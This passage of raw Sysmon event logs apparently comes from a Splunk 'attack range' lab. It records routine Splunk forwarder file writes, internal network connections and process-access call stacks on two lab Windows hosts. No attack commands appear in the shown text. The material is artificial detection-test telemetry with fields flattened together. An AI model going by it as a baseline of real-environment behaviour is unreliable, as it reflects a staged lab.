Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEEF4DE050924C2A5A3385EBEDABD9E7,SHA256=2759D8D16ED21489E28B7B7037686F3013173802759FB4F8F18A22062D8829AB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298007Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:39.987{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49500-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000298006Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:42.359{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12C173E1AACF5FF2D81FFE42F40EE490,SHA256=7F36281BC22C529800ED9C4F51811C3421780E0C1A78B64285119D17FD0F7DAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221850Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:42.042{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-163MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298008Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:43.393{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=198433543E16457968F19EA94B6EFA00,SHA256=C86CE76B0C6A6BC4397DB0030D2C7EB86AF2B60F923786ABE54FFD669CA4D0EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221852Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:43.353{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60997125A7A050BCB954AF17BEA37FD3,SHA256=B7E98A77B96736A755CA78DB96B83B55D7584759B8E9651F364A260EC1659BB8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298010Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:42.547{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49501-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298009Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:44.442{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C75468A8BB1C003308B3E6D7A1D326E0,SHA256=18B7B2AFB795FFED48C8073EE2437E14D8FD066C0BB8030E34562475EF6D7A65,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221879Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:44.853{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1850-6216-2505-000000003902}3424C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221878Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:44.853{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221877Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:44.853{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221876Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:44.853{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221875Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:44.853{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221874Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:44.853{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221873Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:44.853{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221872Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:44.853{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221871Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:44.853{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221870Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:44.853{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221869Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:44.853{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1850-6216-2505-000000003902}3424C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221868Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:44.853{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1850-6216-2505-000000003902}3424C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221867Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:44.854{4F8D34B0-1850-6216-2505-000000003902}3424C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221866Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:44.400{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBF4483CCB1E67FE2BD82E9EA38C7AEA,SHA256=18CEEAFE450556566C53809FCBA60514520E223E8F9BD1EDCEC3E4685F3D0502,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221865Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:44.182{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1850-6216-2405-000000003902}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221864Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:44.182{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221863Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:44.182{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221862Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:44.182{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221861Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:44.182{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221860Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:44.182{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221859Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:44.182{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221858Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:44.182{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221857Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 